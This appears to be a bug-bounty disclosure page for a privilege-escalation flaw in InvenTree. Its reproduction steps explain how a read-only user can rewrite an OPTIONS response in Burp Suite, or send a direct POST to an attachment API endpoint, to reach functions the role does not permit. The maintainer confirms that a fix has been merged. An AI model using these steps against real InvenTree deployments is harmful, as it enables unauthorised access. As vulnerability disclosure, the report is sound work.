Privilege Escalation via edit response body in inventree/inventree

Valid

Reported on

Jun 17th 2022


Description

Recently, i found a business logic vulnerabity and this vulnerability allow reader user perform privilege escalation on allaccess user. Because before user perform any function, client-side will perform OPTIONS request to view user permission with specify function via response body. If the attacker can manipulate response body, the attacker can modify this response body and access sensitive function.

Step to reproduce

1 - User reader can not perform Add Link function.

image

2 - In Burp suite, Proxy > Options > Match and replace , click Add.

Replace "actions":{"GET":true} with "actions":{"POST":{"pk":{"type":"integer","required":true,"read_only":true,"label":"ID"},"build":{"type":"related field","required":true,"read_only":false,"label":"Build","model":"build","api_url":"/api/build/","filters":{},"help_text":""},"attachment":{"type":"file upload","required":true,"read_only":false,"label":"Attachment","help_text":"Select file to attach"},"link":{"type":"url","required":false,"read_only":false,"label":"Link","help_text":"Link to external URL","max_length":200},"filename":{"type":"string","required":true,"read_only":false,"label":"Filename"},"comment":{"type":"string","required":false,"read_only":false,"label":"Comment","help_text":"File comment","max_length":100},"upload_date":{"type":"date","required":true,"read_only":true,"label":"Upload date","help_text":""},"user":{"type":"related field","required":false,"read_only":false,"label":"User","help_text":"User","model":"user","api_url":"/api/user/","filters":{}},"user_detail":{"type":"nested object","required":true,"read_only":true,"label":"User detail","children":{"pk":{"type":"integer","required":true,"read_only":true,"label":"ID"},"username":{"type":"string","required":true,"read_only":false,"label":"Username","help_text":"Required. 150 characters or fewer. Letters, digits and @/./+/-/_ only.","max_length":150},"first_name":{"type":"string","required":false,"read_only":false,"label":"First name","max_length":150,"help_text":""},"last_name":{"type":"string","required":false,"read_only":false,"label":"Last name","max_length":150,"help_text":""},"email":{"type":"email","required":false,"read_only":false,"label":"Email address","max_length":254,"help_text":""}}}},"DELETE":true,"GET":true}

image And click OK.

3 - Try Add link funcion again with reader account, and success!

image

Impact

This vulnerability allow attacker with low privilege can perform high privilege to access sensitive function.

We are processing your report and will contact the inventree team within 24 hours. 8 days ago
Nhien.IT modified the report
8 days ago
Oliver modified the Severity from Critical (9.4) to Medium (6.5) 8 days ago
Oliver
8 days ago

Maintainer


Thanks for reporting this. I have found that there is an even easier way to reproduce this:

Simply navigate to the appropriate API URL e.g. /api/part/attachment/ and an authenticated user who nominally cannot create or edit attachments can issue a POST request against this endpoint. No manipulation of front-end code is required.

We will have a fix out for this ASAP, thanks again for reporting.

The researcher has received a minor penalty to their credibility for miscalculating the severity: -1
Oliver validated this vulnerability 8 days ago
Nhien.IT has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Oliver confirmed that a fix has been merged on 12fccc 8 days ago
Oliver has been awarded the fix bounty
Nhien.IT
8 days ago

Researcher


Hi @mainter,

any bounty for this vulnerability?

to join this conversation